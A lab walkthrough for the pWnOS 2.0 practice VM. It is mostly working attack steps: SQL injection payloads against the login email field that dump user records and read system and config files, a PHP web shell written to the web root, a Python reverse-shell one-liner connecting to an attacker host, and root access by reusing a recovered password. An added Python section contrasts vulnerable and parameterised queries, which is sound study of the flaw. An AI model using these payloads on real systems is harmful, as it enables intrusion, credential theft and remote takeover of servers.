pWnOS 2.0

Goal:

Get root... Win!

About:

pWnOS v2.0 is a Virtual Machine image which hosts a server to practice penetration testing. It will test your ability to exploit the server and contains multiple entry points to reach the goal (root). It was designed to be used with VMware Workstation 7.0, but can also be used with most other virtual machine software.

Configuration & Setup:

Configure your attacking platform to be within the 10.10.10.0/24 network range.

The server's IP is statically set to 10.10.10.100.
Server's Network Settings:
IP: 10.10.10.100
Netmask: 255.255.255.0
Gateway: 10.10.10.15

pWnOS 2.0 VM Download

Walkthrough Video

Notes

//intercept the login POST request with Burp Suite
//alter the POST data (the email field is injectable)

email='&pass=pass&submit=Login&submitted=TRUE

email=' order by 1-- -&pass=pass&submit=Login&submitted=TRUE
email=' order by 9-- -&pass=pass&submit=Login&submitted=TRUE
//MySQL Error: Unknown column '9' in 'order clause'

email=' union select 1,2,3,4,5,6,7,8-- -&pass=pass&submit=Login&submitted=TRUE
email=' union select 1,2,3,@@version,5,6,7,8-- -&pass=pass&submit=Login&submitted=TRUE
email=' union select 1,2,3,user(),5,6,7,8-- -&pass=pass&submit=Login&submitted=TRUE

email=' union select 1,2,3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_name='users'-- -&pass=pass&submit=Login&submitted=TRUE
email=' union select 1,2,3,group_concat(user_id,0x3a,email,0x3a,pass,0x3a,user_level,0x3a),5,6,7,8 from users-- -&pass=pass&submit=Login&submitted=TRUE
email=' union select 1,2,3,group_concat(user_id,0x3a,first_name,0x3a,last_name,0x3a,email,0x3a,pass,0x3a,user_level,0x3a),5,6,7,8 from users-- -&pass=pass&submit=Login&submitted=TRUE

email=' union select null,null,null,load_file('/etc/passwd'),null,null,null,null-- -&pass=pass&submit=Login&submitted=TRUE
email=' union select null,null,null,load_file('/var/www/login.php'),null,null,null,null-- -&pass=pass&submit=Login&submitted=TRUE
email=' union select null,null,null,load_file('/var/www/includes/config.inc.php'),null,null,null,null-- -&pass=pass&submit=Login&submitted=TRUE
email=' union select null,null,null,load_file('/var/www/mysqli_connect.php'),null,null,null,null-- -&pass=pass&submit=Login&submitted=TRUE
//MySQL credentials recovered from mysqli_connect.php: user root, password goodday

//write php shell onto disk
email=' union select null,null,null,"<?php system($_GET['cmd']);?>",null,null,null,null into outfile '/var/www/shell.php'-- -&pass=pass&submit=Login&submitted=TRUE

//confirm shell is written to webserver root
email=' union select null,null,null,load_file('/var/www/shell.php'),null,null,null,null-- -&pass=pass&submit=Login&submitted=TRUE
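As an added example (not from the notes or the VM's own login.php), a Python/sqlite3 stand-in for the login query shows why the email field accepts the union and ORDER BY payloads above and how a parameterised query stops them. The schema, the sample user, the password and the SHA1 hashing are constructed assumptions.

```python
import hashlib
import sqlite3

def sha1(text):
    # Assumption: the app stores SHA1 password hashes (constructed, not from the notes)
    return hashlib.sha1(text.encode()).hexdigest()

def open_db():
    # Constructed in-memory users table with the column names the notes enumerate
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, "
                 "email TEXT, pass TEXT, user_level INTEGER)")
    conn.execute("INSERT INTO users VALUES (1, 'Sample', 'Admin', 'admin@example.test', ?, 0)",
                 (sha1("correct-horse"),))
    return conn

def login_vulnerable(conn, email, password):
    # Query built by string interpolation: whatever is typed into the email field
    # becomes part of the SQL text, so a leading quote ends the literal early.
    sql = (f"SELECT user_id, email, user_level FROM users "
           f"WHERE email='{email}' AND pass='{sha1(password)}'")
    return conn.execute(sql).fetchall()

def login_hardened(conn, email, password):
    # Same query with bound parameters: the driver passes the email as a value,
    # never as SQL, so quotes, UNION and comment markers have no meaning.
    sql = "SELECT user_id, email, user_level FROM users WHERE email=? AND pass=?"
    return conn.execute(sql, (email, sha1(password))).fetchall()

# The notes' union payload, trimmed to this three-column query
UNION_PAYLOAD = "' union select user_id, email, pass from users-- -"
# The notes' column-count probe; the vulnerable build leaks a DB error for it
PROBE_PAYLOAD = "' order by 9-- -"

def probe(conn, login):
    # Returns (rows, error_text): an interpolated query raises and leaks the
    # error, a parameterised one just finds no user with that "email"
    try:
        return login(conn, PROBE_PAYLOAD, "pass"), None
    except sqlite3.OperationalError as exc:
        return None, str(exc)

def demo():
    conn = open_db()
    return {
        "vulnerable_union": login_vulnerable(conn, UNION_PAYLOAD, "pass"),
        "hardened_union": login_hardened(conn, UNION_PAYLOAD, "pass"),
        "vulnerable_probe": probe(conn, login_vulnerable),
        "hardened_probe": probe(conn, login_hardened),
        "legit": login_hardened(conn, "admin@example.test", "correct-horse"),
    }
```

The load_file and INTO OUTFILE steps in the notes additionally depend on the database account holding MySQL's FILE privilege and on the web root being writable by the MySQL process; a least-privilege DB account removes that file read/write vector even if an injection slips through.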

//shell can be accessed at http://10.10.10.100/shell.php?cmd=[command]
http://10.10.10.100/shell.php?cmd=id
http://10.10.10.100/shell.php?cmd=uname -a
http://10.10.10.100/shell.php?cmd=which python

//python reverse shell one-liner (connects back to the attacker at 10.10.10.50:443)
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.50",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

//privilege escalation
///var/mysqli_connect.php contains the root password
//ssh in using this password